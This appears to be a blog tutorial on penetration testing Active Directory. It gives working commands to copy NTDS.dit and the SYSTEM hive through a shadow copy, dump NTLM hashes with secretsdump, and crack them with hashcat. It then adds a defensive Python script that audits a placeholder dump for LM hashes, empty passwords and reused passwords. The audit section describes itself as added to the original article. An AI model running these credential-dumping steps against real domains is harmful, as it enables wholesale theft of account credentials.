Posted On August 3, 2019

Penetration Testing of Active Directory

By kimconnect

Foreword: the following information is intended as educational content and advisories on security topics. Please be reminded that it is against the law to perform penetration testing on private enterprise computers or networks without management directive and authorization. It is my intention to omit instructions to perform evasive techniques, as that is against the moral character of ethical hacking.

1. Grab NTDS.dit and the SYSTEM hive from a domain controller

REM NTDS.dit is locked while the directory service is running, so copy it from a Volume Shadow Copy
vssadmin create shadow /for=C:
REM vssadmin prints the "Shadow Copy Volume Name"; the index (VolumeShadowCopy1 below) varies, use the one it reports
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\
REM Alternatively, export the SYSTEM hive (holds the boot key needed to decrypt NTDS.dit) with reg.exe
reg save HKLM\SYSTEM C:\systemhive

2. Extract the hashes using Impacket's secretsdump.py

git clone https://github.com/fortra/impacket /opt/impacket
cd /opt/impacket && python setup.py install
# LOCAL mode decrypts an offline NTDS.dit with the boot key from the SYSTEM hive; the output file gets a .ntds suffix
python /opt/impacket/examples/secretsdump.py -ntds ~/pentest/ntds.dit -system ~/pentest/SYSTEM -hashes lmhash:nthash LOCAL -outputfile pentest-ntlm-extract

3. Crack the hashes using one of these tools:

  1. OphCrack
  2. John the Ripper
  3. HashCat

     The first command runs a wordlist attack (mode 1000 = NTLM) against the pentest-ntlm-extract.ntds file produced in step 2 and writes hash:plain pairs to pentest.out; the second reads that file back as a pot file and prints the cracked entries with their usernames:

     hashcat -m 1000 -w 3 -a 0 -p : --session=all --username -o ~/pentest/pentest.out --outfile-format=3 ~/pentest/pentest-ntlm-extract.ntds ~/pentest.txt --potfile-path ~/pentest/hashcat.pot
     hashcat -m 1000 -w 3 -a 0 -p : --session=all --username --show -o ~/pentest/pentest_1.out --outfile-format=3 ~/pentest/pentest-ntlm-extract.ntds --potfile-path ~/pentest/pentest.out

  4. Plain PowerShell
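Once secretsdump has produced the .ntds file, the most useful defensive output of an engagement like this is not the cracked passwords but the hygiene findings: which accounts still store an LM hash (meaning the NoLMHash policy was not in effect when the password was set), which accounts have an empty password, and which accounts share the same NT hash (password reuse, often a service account password copied onto admin accounts). The script below is an added example written for this post, not part of the original article or of Impacket; it parses the `DOMAIN\user:RID:LMHASH:NTHASH:::` line layout that secretsdump writes and runs those three checks over a constructed sample dump whose hashes are obvious placeholders. The two hash constants are public, well-known values, not secrets.

```python
import re
from collections import defaultdict

# Public, well-known constants (not secrets): the LM field Windows stores when
# no LM hash is kept, and the NT hash of the empty password.
BLANK_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

# secretsdump.py -outputfile writes one account per line:
#   DOMAIN\user:RID:LMHASH:NTHASH:::
LINE_RE = re.compile(
    r"^(?P<user>[^:]+):(?P<rid>\d+):(?P<lm>[0-9a-fA-F]{32}):(?P<nt>[0-9a-fA-F]{32}):::$"
)

# Constructed sample dump: hashes are placeholders, not real credentials.
# The first line is deliberately not a hash record, to show that noise is skipped.
SAMPLE_DUMP = """\
[*] constructed noise line, not a hash record
CORP\\Administrator:500:aad3b435b51404eeaad3b435b51404ee:11111111111111111111111111111111:::
CORP\\Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
CORP\\jdoe:1105:aad3b435b51404eeaad3b435b51404ee:11111111111111111111111111111111:::
CORP\\legacyapp:1106:22222222222222222222222222222222:33333333333333333333333333333333:::
CORP\\WS01$:1107:aad3b435b51404eeaad3b435b51404ee:44444444444444444444444444444444:::
"""


def parse_ntds_dump(text):
    """Parse secretsdump NTDS output into a list of account records.

    Lines that do not match the hash-record layout are ignored, so the
    function can be fed the raw file exactly as written by -outputfile.
    """
    records = []
    for raw in text.splitlines():
        m = LINE_RE.match(raw.strip())
        if not m:
            continue
        records.append({
            "user": m.group("user"),
            "rid": int(m.group("rid")),
            "lm": m.group("lm").lower(),
            "nt": m.group("nt").lower(),
        })
    return records


def audit_records(records):
    """Return the hygiene findings a defender acts on after such a dump.

    lm_stored      - accounts still storing an LM hash (LM is trivially crackable)
    empty_password - accounts whose NT hash equals that of the empty password
    shared_nt      - NT hashes used by more than one account (password reuse),
                     keyed by hash, excluding the empty-password hash
    """
    lm_stored, empty_password = [], []
    by_nt = defaultdict(list)
    for r in records:
        if r["lm"] != BLANK_LM:
            lm_stored.append(r["user"])
        if r["nt"] == EMPTY_NT:
            empty_password.append(r["user"])
        by_nt[r["nt"]].append(r["user"])
    shared_nt = {h: users for h, users in by_nt.items()
                 if len(users) > 1 and h != EMPTY_NT}
    return {"lm_stored": lm_stored, "empty_password": empty_password,
            "shared_nt": shared_nt}


def audit_dump(text):
    """Convenience wrapper: parse the dump text, then audit it."""
    return audit_records(parse_ntds_dump(text))


if __name__ == "__main__":
    findings = audit_dump(SAMPLE_DUMP)
    print("Accounts still storing LM hashes:", findings["lm_stored"])
    print("Accounts with an empty password:", findings["empty_password"])
    for users in findings["shared_nt"].values():
        # Report the affected accounts, not the hash values, in anything that leaves the analyst's machine
        print(f"{len(users)} accounts share one NT hash: {users}")
```

On the sample, the audit reports `CORP\legacyapp` as still storing an LM hash, `CORP\Guest` as having an empty password, and `CORP\Administrator` and `CORP\jdoe` as sharing a password. Those three lists map directly onto remediation items (enforce NoLMHash and rotate the affected passwords, disable or reset empty-password accounts, break the reuse between admin and user accounts) and can be handed to the AD owners without the hash material ever leaving the engagement host.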
